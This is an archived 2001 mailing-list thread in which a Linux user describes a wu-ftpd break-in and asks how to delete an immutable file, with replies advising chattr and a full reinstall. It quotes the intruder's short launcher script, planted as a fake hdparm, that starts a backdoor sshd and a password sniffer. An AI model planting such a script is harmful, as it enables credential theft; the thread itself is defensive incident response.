Re: ftp was hacked

From: Ed Turner (
Date: 12/30/01

  • Next message: gaius.petronius: "understanding chkrootkit: sshd section"

    From: Ed Turner <>
    Date: Sun, 30 Dec 2001 04:32:00 GMT

    You want to use the 'chattr' to see if the hacker changed the immutable bit on the file. If this was set, no
    one not even root can erase, rename, modify, or anything. It has to be unset by root using this command, then
    you should be able to do whatever it is you need to do.

    Ed Turner
    Chicago, IL

    Bill Unruh wrote:

    > In <> "R.A.Wilson" <> writes:
    > ]Hi -
    > ]I have some info to pass along, and a question...
    > ]A cracker exploited a hole in wu-ftp 2.6.0 and managed to install
    > ]a sniffer and a port scanner on my machine. I use slackware, 2.2.16
    > ]The only reason I found out is that a sharp Linux administrator noted
    > ]port scans coming from my machine and wanted to know what was going on.
    > ]I looked like the bad guy.
    > ]After a lot of work, I found the intruder had made a directory where
    > ]he put his sniffer log and other programs. He had them set up in:
    > ] /dev/ida/.inet
    > ]I don't believe that's a legitimate diretory.
    > ]When I looked at a file called tcp.log, in that directory, I was
    > ]stunned to see he had plain text passwords of all the users on my
    > ]machine. I couldn't pull the plug fast enough!
    > ]He also had managed to put an illegal account in /etc/passwd. He used
    > ]the account name www. I found files belonging to www and rm'd them.
    > ]I also took him out of the passwd file. I updated wu-ftp to the latest
    > ]version of 2.6.2 and thought that solved the problem.
    > ]A few days later I wanted to install a later version of hdparm. I was
    > ]using version 3.9 and 4.6 was out. I did a 'locate hdparm' and found
    > ]two of them: one in /use/bin/hdparm and the other in /use/sbin.hdparm.
    > ]Which was correct? I did 'which hdparm' and found the one in /usr/sbin
    > ]was it. it was also a binary file. Curious, I looked at the other one.
    > ]This is what it looked like:
    > ] #!/bin/sh
    > ] cd /dev/ida/.inet
    > ] ./sshdu -f ./s
    > ] ./linsniffer >> ./tcp.log &
    > ] cd /
    > ]So, just by a lucky accident I had discovered the intruder's script to
    > ]call his sniffer.
    > ]I tried to move the file. I tried to edit the file. I tried to remove
    > ]it. Nothing. Root cannot touch it! Here's the system message I get
    > ]when I try any of the above...
    > ] cannot unlink 'hdparm': Operation not permitted.
    > ]Now my question... HOW THE HELL DO I GET RID OF THIS GARBAGE???
    > ] -Roy Wilson-
    > ]===================================================================
    > What you do is to backup all of your users files and then you wipe the
    > disk and reinstall, making sure that you install all of the security
    > patches. Then you replace the backup material that you need. Then you
    > scan all of that backed up material for suid files and get rid of them.
    > eg
    > find /home -perm +6000 -ls
    > PS In answer to your question, read
    > man chattr, especially the -i flag.
    > But as you have discovered the chances of your finding all of the
    > backdoors he has installed are nill.
    > So do not try. Just reinstall, and remmember to keep up with security
    > patches. That hole was patched about a year ago.